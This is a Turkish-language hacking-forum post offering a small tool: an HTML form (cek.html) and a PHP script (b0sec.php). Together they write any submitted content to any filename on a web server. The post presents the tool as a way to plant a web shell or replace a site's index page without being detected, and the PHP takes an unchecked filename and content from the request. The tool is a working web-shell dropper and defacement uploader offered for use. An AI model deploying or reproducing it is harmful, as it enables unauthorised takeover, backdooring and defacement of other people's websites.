Rating - 0%
"cek.html" olarak bunu upload edip aynı dizine "b0sec.php" yide atıp "cek.html" e girip yapıp index kodlarını ve index adını "alfa.php mesela" oluşturup buttoma tıkladığınızda saldırgan vb. algılamadan shellinzi sw ye yüklicektir..
cek.html;
b0sec.php;
cek.html;
View hidden content is available for registered users!
HTML:
<form action="b0sec.php" method="post">
Dosya Adı : <input type="text" name="dosyaadi" value="index.php" /><br>
Shell kodlarimiz : <textarea name="metin" cols="40" rows="3"></textarea><br>
<input type="submit" value="Olustur" />
</form>
<form action="b0sec.php" method="post">
Dosya Adı : <input type="text" name="dosyaadi" value="index.php" /><br>
Shell kodlarimiz : <textarea name="metin" cols="40" rows="3"></textarea><br>
<input type="submit" value="Olustur" />
</form>b0sec.php;
View hidden content is available for registered users!
PHP:
<?php
$dosyaadi = $_POST["dosyaadi"];
$metin = $_POST["metin"];
$dosyaolustur = touch($dosyaadi);
if($dosyaolustur){
echo '<div id="basarili" style="background:lightyellow; margin:10px; padding:10px; border:1px solid #ccc">Başarılı Bir şekilde "'.$dosyaadi.'" oluşturulmuştur.</div>';
}else {
echo '<div id="hata" style="background:red; color:#fff; margin:10px; padding:10px; border:1px solid #ccc">Sistem durakladi fakat yazdırılmış olabilir.</div>';
}
// Oluşan Dosyamızı Açıyoruz.
$dosyaadi = fopen($dosyaadi,"a+");
$yaz = fwrite($dosyaadi,$metin);
fclose($dosyaadi);
if($yaz){
echo '<div id="basarili" style="background:lightyellow; margin:10px; padding:10px; border:1px solid #ccc">Başarılı Bir şekilde aşağıdaki metin dosyaya yazılmıştır.
<p><b>"'.$metin.'"</b></p></div>';
}else {
// B0RU70
echo '<div id="hata" style="background:red; color:#fff; margin:10px; padding:10px; border:1px solid #ccc">Bir sorun oluştu fakat yazdırılmış olabilir.</div>';
}
?>
eline sağlık
